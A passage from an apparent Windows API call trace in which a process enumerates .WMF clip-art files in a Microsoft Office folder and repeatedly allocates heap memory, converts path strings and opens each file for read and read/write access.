InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.111] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x94a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00100_.WMF", cAlternateFileName="")) returned 1 [0103.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0103.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0103.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0103.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0103.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0103.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0103.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0103.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0103.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0103.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0103.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.112] AreFileApisANSI () returned 1 [0103.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0103.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0103.112] AreFileApisANSI () returned 1 [0103.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0103.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 69 [0103.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.113] GetFileType (hFile=0x368) returned 0x1 [0103.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0103.113] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.113] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.113] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.113] CloseHandle (hObject=0x368) returned 1 [0103.114] AreFileApisANSI () returned 1 [0103.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0103.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 69 [0103.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.114] GetFileType (hFile=0x368) returned 0x1 [0103.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0103.114] CloseHandle (hObject=0x368) returned 1 [0103.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0103.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0103.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0103.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.115] AreFileApisANSI () returned 1 [0103.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0103.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 69 [0103.115] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x94a)) returned 1 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0103.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.116] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00135_.WMF", cAlternateFileName="")) returned 1 [0103.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0103.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0103.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0103.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0103.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0103.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0103.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0103.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.117] AreFileApisANSI () returned 1 [0103.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0103.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0103.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.117] AreFileApisANSI () returned 1 [0103.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ac50 [0103.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8ac50, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 69 [0103.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.117] GetFileType (hFile=0x368) returned 0x1 [0103.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0103.118] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.118] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.118] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.118] CloseHandle (hObject=0x368) returned 1 [0103.118] AreFileApisANSI () returned 1 [0103.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0103.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 69 [0103.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.118] GetFileType (hFile=0x368) returned 0x1 [0103.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0103.119] CloseHandle (hObject=0x368) returned 1 [0103.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0103.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0103.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0103.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0103.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 